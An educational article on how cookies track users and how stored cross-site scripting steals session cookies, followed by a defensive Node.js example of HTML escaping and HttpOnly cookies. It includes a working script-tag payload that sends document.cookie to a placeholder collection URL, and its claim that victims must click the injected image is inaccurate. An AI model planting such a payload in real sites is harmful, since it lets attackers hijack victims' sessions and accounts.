Cookie Tracking and Stealing using Cross-Site Scripting

How cookies are used on a website

A cookie is a small piece of data, typically a randomly generated alphanumeric string, that a website sends to your browser when you visit a page. The browser keeps it as a record of your presence on that site so that the site can recognize you on your next visit by your previous session (this value is known as the session ID). That is not the only purpose of cookies: they are also used extensively to keep track of your preferences online, they travel from one server to another, and they can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.

The Cookie Trail

As stated earlier, when we request a webpage from a server, the server returns the page (mostly HTML, CSS and some JavaScript) to our browser, which renders it on our local machine. Along with the page it also sends a cookie (a first-party cookie) that identifies the session.
Besides the website itself, when we visit a webpage we often see a lot of adverts. These ads are not actually part of that website but are supplied to it by different servers around the world in exchange for money. Whenever we click one of these ads, a cookie is sent back to its respective server, and that server stores it to keep track of our preferences. The ad servers also communicate with each other and form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time without knowing it. With this in mind, the EU passed a directive known as "The Cookie Law", under which a site has to ask for your permission to use cookies. This is why you see a message on certain sites like "This site uses cookies to enhance user experience..." asking for your permission.

The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and give them a choice to allow it or not.

Cookie Theft

Shopping preferences might not count as sensitive information about an individual, but online shopping carts and banking details are really sensitive data, and all of this is also remembered by a site with the help of session cookies. If an attacker manages to get hold of your session cookie, that person will be able to pose as you on that site, gaining access to your banking details and your Amazon shopping cart, and might order items from your Amazon account to his or her own address, spending your money. This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit it. This is found mostly in badly coded websites where the developer has omitted the security measures (such as escaping user input before it is written into the page) that prevent an attacker's script from running.

How XSS is used to steal cookies

I'm going to explain this with a hypothetical scenario. Let's say we visit one such vulnerable site which has a comments section. On an ideal, secure website a comment section should only accept and display plain text, but on an insecure site, if we post code in the comment section, the site writes it into the page unchanged and the browser treats it as if it were code sent by the server, so it runs it.

    <script>
    document.write('<img src="http://localhost/submitcookie.php?cookie='
      + escape(document.cookie) + '" />');
    </script>


  • This code, when posted in the comments section, will trick the browser into thinking that it is JavaScript code sent by the server (because of the script tags), and the browser will run it.
  • When some user visiting the site looks at the comment section, he or she will see a link to an image in the comments section, which is actually the result of the script running.
  • When the user clicks on this link thinking that it is an image (whereas it actually points to a PHP file), an image is rendered in the comment section. What they don't know is that this link silently executed a PHP file which grabs their cookie.
  • Now the cookie containing that user's session ID is saved in the attacker's database, and the attacker can pose as that user on that site.
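The defender's side of the comment-section scenario above, as an added example in Node.js that is not from the original article or its author. It places a vulnerable comment renderer beside a hardened one that HTML-escapes user input, so a posted script tag is displayed as text instead of being executed, and adds a helper that issues the session cookie with the HttpOnly flag, so that document.cookie cannot read it even if some script does run. The function names (escapeHtml, renderCommentUnsafe, renderComment, buildSessionCookie, containsScriptTag) and the sample comment are constructed for this example.

```javascript
// Added example (not from the original article): output escaping and
// HttpOnly session cookies as the two mitigations for the scenario above.
// All names here are hypothetical; nothing is taken from a real code base.

// Entity map for the five characters that can change HTML structure.
const ESCAPE_MAP = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Replace every HTML-significant character with its entity so the text is
// rendered literally and can never open a tag or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// Vulnerable rendering: the comment body is concatenated into the page
// unchanged, so a "<script>" tag in the comment becomes real markup.
function renderCommentUnsafe(author, body) {
  return `<li><b>${author}</b>: ${body}</li>`;
}

// Hardened rendering: both author and body pass through escapeHtml before
// they are written into the HTML.
function renderComment(author, body) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Build a Set-Cookie header value for the session ID. HttpOnly keeps the
// value out of document.cookie, Secure restricts it to HTTPS, and
// SameSite=Lax limits it being sent on cross-site requests. The ID is
// validated as an opaque token so no attribute separators can be injected.
function buildSessionCookie(sessionId) {
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) {
    throw new Error('session ID must be an opaque alphanumeric token');
  }
  return `sessionid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Small check used to compare the two renderers: does the fragment still
// contain a script tag that a browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample comment carrying a script tag, standing in for the
// kind of comment described in the article.
const SAMPLE_COMMENT = '<script>alert(1)</script>';

// Demonstration: the unsafe renderer keeps the tag, the safe one neutralises it.
console.log('unsafe :', renderCommentUnsafe('guest', SAMPLE_COMMENT));
console.log('escaped:', renderComment('guest', SAMPLE_COMMENT));
console.log('cookie :', buildSessionCookie('abc123'));
```

Run it with node; the unsafe renderer prints the tag intact while the hardened one prints `&lt;script&gt;alert(1)&lt;/script&gt;`, which a browser shows as text. Output escaping is the control that actually removes the vulnerability; HttpOnly only limits what an injected script can read, and a browser fetches an image source as soon as the comment is displayed, so server-side escaping rather than user caution is what prevents the cookie from leaving the page.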

Related Article:
How are cookies used in a website
Session Hijacking

References: Computerphile – YouTube channel

This article is contributed by Palash Nigam.

